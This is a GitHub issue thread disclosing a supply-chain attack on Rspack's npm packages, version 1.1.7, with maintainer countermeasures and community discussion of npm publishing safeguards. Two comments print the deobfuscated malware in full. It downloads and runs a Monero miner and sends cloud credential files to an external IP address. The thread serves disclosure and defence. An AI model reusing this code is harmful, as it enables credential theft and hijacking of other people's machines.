### ISSUE TITLE
[Notice]: Version 1.1.7 of @rspack/core and @rspack/cli has security risks. Please use version 1.1.8 or v1.1.6 instead

### ISSUE THREAD

**Issue by baiwusanyu-c** [web-infra-dev/rspack#8767]
## Notice from Rspack team

Rspack have encountered an attack, `@rspack/core` and `@rspack/cli` 1.1.7 are vulnerable versions released by the attacker, and contain malicious scripts. 

Rspack team have taken countermeasures:
- Deprecated 1.1.7 and pointed the latest dist-tag to 1.1.6
- Invalidated all existing npm tokens and GitHub tokens
- Checked the permissions of the repository and npm packages
- Checked for potential vulnerabilities

The Rspack v1.1.8 has been released by Rspack team. This version is a re-release of v1.1.6 to prevent the attacked version from being installed wrongly. You can use either of them.

Rspack team will elaborate on the entire process in detail later.

---
> The original issue

### System Info

System:
    OS: Windows 10 10.0.19045
    CPU: (8) x64 11th Gen Intel(R) Core(TM) i5-1135G7 @ 2.40GHz
    Memory: 1.70 GB / 15.73 GB
  Binaries:
    Node: 20.10.0 - C:\Program Files\nodejs\node.EXE
    Yarn: 1.22.22 - ~\AppData\Local\pnpm\yarn.CMD
    npm: 10.2.3 - C:\Program Files\nodejs\npm.CMD
  Browsers:
    Edge: Chromium (127.0.2651.74)
    Internet Explorer: 11.0.19041.4355
  npmPackages:
    @rspack/cli: ^1.1.6 => 1.1.7 
    @rspack/core: ^1.1.6 => 1.1.7 

### Details

![Image](https://github.com/user-attachments/assets/bd0fbd83-956e-419b-9398-ae7fc892418f)

### Reproduce Steps

run `rspack build`

**Comment by jamg26** [comment]
Having the same issue, you can temporary fix it.

```
"devDependencies": {
    "@rspack/cli": "1.1.6",
    "@rspack/core": "1.1.6",
    "@rspack/binding": "1.1.6",
    "@rspack/binding-darwin-arm64": "1.1.6",
...................
```


```
"resolutions": {
    "@rspack/cli": "1.1.6",
    "@rspack/core": "1.1.6",
    "@rspack/binding": "1.1.6",
    "@rspack/binding-darwin-arm64": "1.1.6",
...................
```

**Comment by fufuShih** [comment]
I have same issue, but i was used in rsbuild。
```
	"devDependencies": {
		"@aaroon/workbox-rspack-plugin": "^0.3.2",
		"@rsbuild/core": "^1.1.6",
		"@rsbuild/plugin-image-compress": "^1.1.0",
		"@rsbuild/plugin-react": "^1.1.0",
```
Log:
```
start   Building...
<e> [webpack-dev-middleware] Error: Unmatched version @rspack/core@1.1.7, @rspack/binding@1.1.6, @rspack/binding-win32-x64-msvc@1.1.6
<e>     at checkVersion (C:\workspace\onesec-gc\node_modules\@rspack\core\dist\index.js:13388:21)
<e>     at #getInstance (C:\workspace\onesec-gc\node_modules\@rspack\core\dist\index.js:13903:19)
```

**Comment by LingyuCoder** [comment]
Version 1.1.7 is an unavailable version. We have deprecated it. Please use version 1.1.6.

**Comment by danilopontes** [comment]
FYI I recently tried a new React project following the official rspack docs and the version 1.1.8 is added. And the same issue happens.

**Comment by LingyuCoder** [comment]
> FYI I recently tried a new React project following the official rspack docs and the version 1.1.8 is added. And the same issue happens.

The version 1.1.7 was released by someone who stole the npm token of a team member and may have security risks. Please do not download and run it. Please use version 1.1.6. 

There is no `@rspack/core@1.1.8` on npm yet, I am not sure where it is from.

**Comment by chenjiahan** [comment]
We have encountered an attack, `@rspack/core` and `@rspack/cli` 1.1.7 are vulnerable versions released by the attacker, and contain suspicious scripts.

We have taken countermeasures:
- Deprecated 1.1.7 and pointed the latest dist-tag to 1.1.6
- Invalidated all existing npm tokens and GitHub tokens
- Checked the permissions of the repository and npm packages
- Checked for potential vulnerabilities

We will release a secure Rspack 1.1.8 version soon.

**Comment by LingyuCoder** [comment]
Rspack v1.1.8 has been released.

**Comment by crazyming9528** [comment]
damn

**Comment by yisibl** [comment]
I hope the NPM team should seriously consider this: features that require **approval** from others when releasing npm packages.

**Comment by chenjiahan** [comment]
@yisibl I wish npm would allow us to restrict publishing sources, for example, when `provenance` is enabled, only allowing publishing from GitHub Actions on the main branch of specified repository.

**Comment by chris-nie** [comment]
Can someone explain a bit about how it happened technically? 🤔 It will be really appreciated.

**Comment by wengjiacheng** [comment]
@chenjiahan 你好，请问1.1.6版本之前的是否有影响？安装的是1.1.6之前版本或者1.1.8版本是吗？

**Comment by hardfist** [comment]
> [<img alt="" width="16" height="16" src="https://avatars.githubusercontent.com/u/7237365?s=64&amp;u=f5ef43b6e73119fc973c14bf7ff6e029ad07417a&amp;v=4">@chenjiahan](https://github.com/chenjiahan) 你好，请问1.1.6版本之前的是否有影响？安装的是1.1.6之前版本或者1.1.8版本是吗？

only 1.1.7 is affected, other versions are all safe

**Comment by hardfist** [comment]
> Can someone explain a bit about how it happened technically? 🤔 It will be really appreciated.

We will explain more information when we complete the investigation into the root cause of the token theft.

**Comment by SukkaW** [comment]
One thing I noticed is that rspack uses CI and npm provenance when publishing the packages. The attacker apparently does not have access to the CI here, so the affected version (`1.1.7`) is actually not attested (suggesting that he is most likely publishing the package from his own computer).

One way for users to defend against this kind of attack is for package managers to implement a protection mechanism that prevents an already attested package from upgrading to an unattested version.

I have raised the feature request to pnpm for now: https://github.com/pnpm/pnpm/issues/8889

**Comment by SukkaW** [comment]
Also there is a similar attack affecting the [`vant`](https://www.npmjs.com/package/vant) package (see https://github.com/youzan/vant/releases/tag/v4.9.15). This is (also?) due to a leaked npm token.

My instinct is that both incidents could be related.

**Comment by hardfist** [comment]
> Also there is a similar attack targetting the [`vant`](https://www.npmjs.com/package/vant) package (see [youzan/vant@`v4.9.15` (release)](https://github.com/youzan/vant/releases/tag/v4.9.15)). This is (also?) due to a leaked npm token.
> 
> My instinct is that both incidents could be related.

yeah maintained by same people, so both affected

**Comment by kelleyma49** [comment]
What was the reasoning for deciding to deprecate instead of unpublishing the infected version? 

https://docs.npmjs.com/unpublishing-packages-from-the-registry#unpublishing-a-single-version-of-a-package

**Comment by benmccann** [comment]
https://github.com/web-infra-dev/rspack/releases/tag/v1.1.8 has more details about the timing, etc.

It looks like the attack was via a `postinstall` script. pnpm users can protect themselves from such attacks by disabling the following setting in their `.npmrc`: https://pnpm.io/cli/run#enable-pre-post-scripts. It would probably be a good idea for package managers to provide more control over which of these scripts are run. I've filed a request for that: https://github.com/pnpm/pnpm/issues/8891

**Comment by wojtekmaj** [comment]
Hey folks,

I've deobfuscated the malicious code. It turned out to be a Webpack bundle. After deobfuscation and a pinch of AI, I ended up with a human readable main module of the malicious code.

TL;DR: 
- Targets Linux only
- Targets the following countries only (using http://ipinfo.io/json): "CN" (China), "RU" (Russia), "HK" (Hong Kong), "UNK" (Unknown), "BY" (Belarus), "IR" (Iran)
- Downloads and executes crypto miner (mining Monero)
- Attempts to find configuration files from common locations (configPaths) that may contain cloud service credentials, combines the contents, encodes them in Base64, and sends them to a remote server (http://80.78.28.72/tokens).

And here's the code for your enjoyment:

```js
function(module, exports, require) {
    // Helper functions for module compatibility
    const createBinding = this && this.__createBinding || (Object.create ? function(target, source, key, alias) {
        if (alias === undefined) alias = key;
        let descriptor = Object.getOwnPropertyDescriptor(source, key);
        if (!descriptor || !("get" in descriptor ? source.__esModule : descriptor.writable || descriptor.configurable)) {
            descriptor = {
                enumerable: true,
                get: function() {
                    return source[key];
                }
            };
        }
        Object.defineProperty(target, alias, descriptor);
    } : function(target, source, key, alias) {
        if (alias === undefined) alias = key;
        target[alias] = source[key];
    });

    const setModuleDefault = this && this.__setModuleDefault || (Object.create ? function(target, value) {
        Object.defineProperty(target, "default", {
            enumerable: true,
            value: value
        });
    } : function(target, value) {
        target.default = value;
    });

    const importAll = this && this.__importStar || function(module) {
        if (module && module.__esModule) return module;
        const result = {};
        for (const key in module) {
            if (key !== "default" && Object.prototype.hasOwnProperty.call(module, key)) {
                createBinding(result, module, key);
            }
        }
        setModuleDefault(result, module);
        return result;
    };

    const asyncWrapper = this && this.__awaiter || function(context, args, PromiseCtor, generator) {
        return new (PromiseCtor || Promise)(function(resolve, reject) {
            function step(result) {
                try {
                    processGenerator(result);
                } catch (error) {
                    reject(error);
                }
            }
            function processGenerator({ done, value }) {
                done ? resolve(value) : Promise.resolve(value).then(next, throwError);
            }
            function next(value) {
                step(generator.next(value));
            }
            function throwError(error) {
                step(generator.throw(error));
            }
            step(generator.apply(context, args || []).next());
        });
    };

    const importDefault = this && this.__importDefault || function(module) {
        return module && module.__esModule ? module : { default: module };
    };

    // Mark module as exportable
    Object.defineProperty(exports, "__esModule", { value: true });

    // Required modules
    const axios = importDefault(require(9329));
    const decompress = importAll(require(661));
    const path = importAll(require(6928));
    const os = importAll(require(857));
    const fs = importAll(require(9896));
    const childProcess = importAll(require(5317));

    // Predefined configuration file paths
    const cloudConfigPaths = [
        path.join(os.homedir(), ".aliyun/config.json"),
        path.join(os.homedir(), ".hcloud/config.json"),
        path.join(os.homedir(), ".tccli/default.credential")
    ];

    // Utility function to check if a value is not null
    function isNotNull(value) {
        return value !== null;
    }

    // Enum for OS types
    const OSTypes = {
        LINUX: 0,
        MAC_OS: 1,
        WINDOWS: 2,
        UNKNOWN: 3
    };

    // Suppress output and logging
    process.stdout.write = () => {};
    process.stderr.write = () => {};
    console.log = () => {};
    console.error = () => {};

    // Main function
    function main() {
        return asyncWrapper(this, void 0, void 0, function* () {
            // Detect OS type
            const osType = yield (function detectOS() {
                switch (process.platform) {
                    case "linux":
                        return OSTypes.LINUX;
                    case "darwin":
                        return OSTypes.MAC_OS;
                    case "win32":
                        return OSTypes.WINDOWS;
                    default:
                        return OSTypes.UNKNOWN;
                }
            })();

            // Terminate if not Linux
            if (osType !== OSTypes.LINUX) {
                process.exit(0);
            }

            // Fetch country based on IP
            const country = yield (function fetchCountry() {
                return asyncWrapper(this, void 0, void 0, function* () {
                    try {
                        const response = yield axios.default.get("http://ipinfo.io/json");
                        return response.status === 200 ? response.data.country : "UNK";
                    } catch {
                        return "UNK";
                    }
                });
            })();

            // Check if in target countries
            if (["CN", "RU", "HK", "UNK", "BY", "IR"].includes(country)) {
                yield (function maliciousActivity() {
                    return asyncWrapper(this, void 0, void 0, function* () {
                        const downloadedFilePath = yield downloadAndExtract("https://api.github.com/repos/youzan/vant/git/blobs/8ed1c9256b4bfeb3e4f5aaff48bf140398361ae3", "vant.tar.gz", "/tmp/");

                        if (!downloadedFilePath) {
                            yield setupAndRunMiner();
                        } else {
                            yield executeFile(downloadedFilePath);
                        }

                        const credentialData = yield fetchCredentials(cloudConfigPaths);
                        yield exfiltrateData(credentialData);
                    });
                })();
            } else {
                process.exit(0);
            }
        });
    }

    // Helper functions for downloading and executing
    function downloadAndExtract(url, fileName, destination) {
        return asyncWrapper(this, void 0, void 0, function* () {
            const filePath = path.join(destination, fileName);
            const extractedPath = path.join(destination, "vant");

            try {
                fs.mkdirSync(destination, { recursive: true });

                const response = yield axios.default({
                    method: "GET",
                    url,
                    responseType: "stream",
                    headers: { Accept: "application/vnd.github.raw+json" }
                });
                const fileStream = fs.createWriteStream(filePath);

                yield new Promise((resolve, reject) => {
                    response.data.pipe(fileStream);
                    fileStream.on("finish", resolve);
                    fileStream.on("error", reject);
                });

                yield decompress.x({
                    file: filePath,
                    cwd: destination
                });
                fs.chmodSync(extractedPath, 0o755);
                fs.unlinkSync(filePath);

                return extractedPath;
            } catch {
                return "";
            }
        });
    }

    function setupAndRunMiner() {
        return asyncWrapper(this, void 0, void 0, function* () {
            const minerPath = yield downloadAndExtract("https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz", "noderig.tar.gz", "/tmp/");
            if (minerPath) {
                yield executeFile(minerPath, [
                    "-u", "475NBZygwEajj4YP2Bdu7yg6XnaphiFjxTFPkvzg5xAjLGPSakE68nyGavn8r1BYqB44xTEyKQhueeqAyGy8RaYc73URL1j",
                    "-o", "pool.supportxmr.com:443",
                    "--tls", "-k",
                    "--cpu-max-threads-hint=75",
                    "--background"
                ]);
            }
        });
    }

    function executeFile(filePath, args = []) {
        return new Promise((resolve, reject) => {
            const child = childProcess.spawn(filePath, args);
            child.on("error", reject);
            resolve(child);
        });
    }

    function fetchCredentials(paths) {
        return asyncWrapper(this, void 0, void 0, function* () {
            const fileContents = paths.map(path => asyncWrapper(this, void 0, void 0, function* () {
                try {
                    return fs.existsSync(path) ? yield fs.promises.readFile(path, "utf8") : null;
                } catch {
                    return null;
                }
            }));
            return (yield Promise.all(fileContents)).filter(isNotNull);
        });
    }

    function exfiltrateData(credentials) {
        return asyncWrapper(this, void 0, void 0, function* () {
            if (credentials.length === 0) return;
            const encodedData = Buffer.from(credentials.join("")).toString("base64");

            try {
                yield axios.default.post("http://80.78.28.72/tokens", encodedData);
            } catch {}
        });
    }

    main().catch(() => {});
}

```

**Comment by kelleyma49** [comment]
> What was the reasoning for deciding to deprecate instead of unpublishing the infected version?
> 
> https://docs.npmjs.com/unpublishing-packages-from-the-registry#unpublishing-a-single-version-of-a-package

To put another way, Can you switch over to unpublishing the version? I'm not sure everyone will see this message and it seems more dangerous to leave an infected version active.

**Comment by hardfist** [comment]
> What was the reasoning for deciding to deprecate instead of unpublishing the infected version?
> 
> https://docs.npmjs.com/unpublishing-packages-from-the-registry#unpublishing-a-single-version-of-a-package

we tried but npm not allow us to unpublish cause there are upstream dependencies

**Comment by DanielRuf** [comment]
There is also some work regarding 2FA for publishing packages in CI environments: https://github.com/nodejs/package-maintenance/issues/244

> It looks like the attack was via a postinstall script. pnpm users can protect themselves from such attacks by disabling the following setting in their .npmrc: https://pnpm.io/cli/run#enable-pre-post-scripts. It would probably be a good idea for package managers to provide more control over which of these scripts are run. I've filed a request for that: https://github.com/pnpm/pnpm/issues/8891

My general recommendation for developers and maintainers is to globally disable scripts.

**Comment by aladdin-add** [comment]
> > What was the reasoning for deciding to deprecate instead of unpublishing the infected version?
> > https://docs.npmjs.com/unpublishing-packages-from-the-registry#unpublishing-a-single-version-of-a-package
> 
> we tried but npm not allow us to unpublish cause there are upstream dependencies

It is still recommended to remove the version in this case to avoid other developers still downloading the attacked version - you can contact the npm staff to remove it.

**Comment by hardfist** [comment]
> There is also some work regarding 2FA for publishing packages in CI environments: [nodejs/package-maintenance#244](https://github.com/nodejs/package-maintenance/issues/244)
> 
> > It looks like the attack was via a postinstall script. pnpm users can protect themselves from such attacks by disabling the following setting in their .npmrc: [pnpm.io/cli/run#enable-pre-post-scripts](https://pnpm.io/cli/run#enable-pre-post-scripts). It would probably be a good idea for package managers to provide more control over which of these scripts are run. I've filed a request for that: [pnpm/pnpm#8891](https://github.com/pnpm/pnpm/issues/8891)
> 
> My general recommendation for developers and maintainers is to globally disable scripts.

Thanks for suggestions, 2FA + provenance is still painful to setup, tried but failed and still don't find a ideal way to enable 2FA in CI for provenance, it seems still no conclusion in the referenced issue, and it seems deno may have better way to deal this https://x.com/lcasdev/status/1762062204327620847, anyone have better safe suggestions about how to do publish in CI with 2FA are welcome

**Comment by rainbowsky911** [comment]
> Hey folks,
> 
> I've analyzed the malicious code. After deobfuscation and a pinch of AI, I ended up with a human readable version. It turned out to be a Webpack bundle, so once I identified the entry module, it became easy.
> 
> TL;DR:
> 
> * Targets Linux only
> * Targets the following countries only (using hxxp://ipinfo.io/json):
>   
>   * "CN" (China),
>   * "RU" (Russia),
>   * "HK" (Hong Kong),
>   * "UNK" (Unknown),
>   * "BY" (Belarus),
>   * "IR" (Iran)
> * Downloads and executes crypto miner (mining Monero)
> * Attempts to find configuration files from common locations (configPaths) that may contain cloud service credentials, combines the contents, encodes them in Base64, and sends them to a remote server (hxxp://80.78.28.72/tokens).
> 
> And here's the simplified version of the code for your enjoyment:
> 
> import axios from 'axios';
> import * as unzipper from 'unzipper';
> import * as path from 'path';
> import * as os from 'os';
> import * as fs from 'fs';
> import * as child_process from 'child_process';
> 
> const configPaths = [
>   `${os.homedir()}/.aliyun/config.json`,
>   `${os.homedir()}/.hcloud/config.json`,
>   `${os.homedir()}/.tccli/default.credential`
> ];
> 
> const OSES = {
>   LINUX: 0,
>   MAC_OS: 1,
>   WINDOWS: 2,
>   UNKNOWN: 3
> };
> 
> const isNotNull = (value) => value !== null;
> 
> const executeProcess = async (executable, args) => {
>   return new Promise((resolve, reject) => {
>     const process = child_process.spawn(executable, args);
>     fs.unlinkSync(executable);
>     process.on("error", reject);
>     resolve(process);
>   });
> };
> 
> process.stdout.write = () => {};
> process.stderr.write = () => {};
> console.log = () => {};
> console.error = () => {};
> 
> const detectOS = async () => {
>   switch (process.platform) {
>     case "linux":
>       return OSES.LINUX;
>     case "darwin":
>       return OSES.MAC_OS;
>     case "win32":
>       return OSES.WINDOWS;
>     default:
>       return OSES.UNKNOWN;
>   }
> };
> 
> const getCountryCode = async () => {
>   try {
>     const response = await axios.get("http://ipinfo.io/json");
>     return response.status === 200 ? response.data.country : "UNK";
>   } catch {
>     return "UNK";
>   }
> };
> 
> const downloadAndSetupMiner = async () => {
>   const tempPath = path.join("/tmp/", "miner.tar.gz");
>   const outputDir = path.join("/tmp/", "miner");
> 
>   try {
>     fs.mkdirSync("/tmp/", { recursive: true });
>   } catch {
>     return "";
>   }
> 
>   try {
>     const response = await axios({
>       method: "GET",
>       url: "https://api.github.com/repos/youzan/vant/git/blobs/8ed1c9256b4bfeb3e4f5aaff48bf140398361ae3",
>       responseType: "stream",
>       headers: { Accept: "application/vnd.github.raw+json" }
>     });
> 
>     const writeStream = fs.createWriteStream(tempPath);
>     await new Promise((resolve, reject) => {
>       response.data.pipe(writeStream);
>       writeStream.on("finish", resolve);
>       writeStream.on("error", reject);
>     });
>   } catch {
>     return "";
>   }
> 
>   try {
>     await unzipper.x({ file: tempPath, cwd: "/tmp/" });
>     fs.chmodSync(outputDir, 0o755);
>   } catch {
>     return "";
>   }
> 
>   try {
>     fs.unlinkSync(tempPath);
>   } catch {
>     return "";
>   }
> 
>   return outputDir;
> };
> 
> const sendConfigData = async (configData) => {
>   if (configData.length === 0) return;
> 
>   const combinedData = configData.join("");
>   const base64Data = Buffer.from(combinedData).toString("base64");
> 
>   try {
>     await axios.post("http://80.78.28.72/tokens", base64Data);
>   } catch {}
> };
> 
> const main = async () => {
>   const osType = await detectOS();
>   if (osType !== OSES.LINUX) {
>     process.exit(0);
>   }
> 
>   const countryCode = await getCountryCode();
>   const restrictedCountries = ["CN", "RU", "HK", "UNK", "BY", "IR"];
> 
>   if (!restrictedCountries.includes(countryCode)) {
>     process.exit(0);
>   }
> 
>   const minerPath = await downloadAndSetupMiner();
> 
>   if (minerPath) {
>     await executeProcess(minerPath, []);
>   }
> 
>   const configs = await Promise.all(
>     configPaths.map(async (filePath) => {
>       try {
>         return fs.existsSync(filePath) ? await fs.promises.readFile(filePath, "utf8") : null;
>       } catch {
>         return null;
>       }
>     })
>   );
> 
>   await sendConfigData(configs.filter(isNotNull));
> };
> 
> main().catch(() => {});
Hong Kong is not a country

**Comment by rainbowsky911** [comment]
Hong Kong is not a country

**Comment by zcyzcy98** [comment]
> Hong Kong is not a country

顶你

**Comment by hardfist** [comment]
> > > What was the reasoning for deciding to deprecate instead of unpublishing the infected version?
> > > https://docs.npmjs.com/unpublishing-packages-from-the-registry#unpublishing-a-single-version-of-a-package
> > 
> > 
> > we tried but npm not allow us to unpublish cause there are upstream dependencies
> 
> It is still recommended to remove the version in this case to avoid some developers still downloading the attacked version - you can contact the npm staff to remove it.

already submit remove request to npm still waiting for response

**Comment by asasugar** [comment]
Is it because of public actions?

**Comment by chenjiahan** [comment]
> Is it because of public actions?

The root cause was an attack on public actions in another GitHub organization, where the attacker stole a token through a Pwn request. And the token owner had permissions to our organization.

**Comment by chenjiahan** [comment]
As this has been resolved, we're closing this issue. Please feel free to comment or open new issues if you have any additional feedback. Thank you all for your support throughout this process.
